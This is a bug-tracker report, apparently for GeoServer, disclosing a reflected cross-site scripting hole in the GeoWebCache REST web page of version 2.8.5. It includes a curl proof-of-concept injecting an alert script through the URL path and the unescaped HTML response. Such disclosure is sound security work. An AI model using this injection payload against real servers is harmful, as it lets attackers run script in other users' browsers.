summary

Another XSS vulnerability in GWC

Description

Running

curl 'http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>'

yields an answer with unescaped HTML:

<html><body>
<a id="logo" href="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</"><img src="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>/web/geowebcache_logo.png" alt="" height="100" width="353" border="0"/></a>
<h3>Resources available from here:</h3><ul><li><h4><a href="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>/layers/">layers</a></h4>Lets you see the configured layers. You can also view a specific layer  by appending the name of the layer to the URL, DELETE an existing layer  or POST a new one. Note that the latter operations only make sense when GeoWebCache has been configured through geowebcache.xml. You can POST either XML or JSON.</li>
<li><h4>seed</h4></li>
</ul></body></html>

Looks like the problem is similar to GEOS-7549.

Environment

Tomcat 7, OpenJDK 1.8.0_102

Status

Assignee

Unassigned

Reporter

Juraj Hrubsa

Triage

None

Fix versions

2.12-RC1

Affects versions

2.8.5

Components

Vulnerability

Priority

Medium

Configure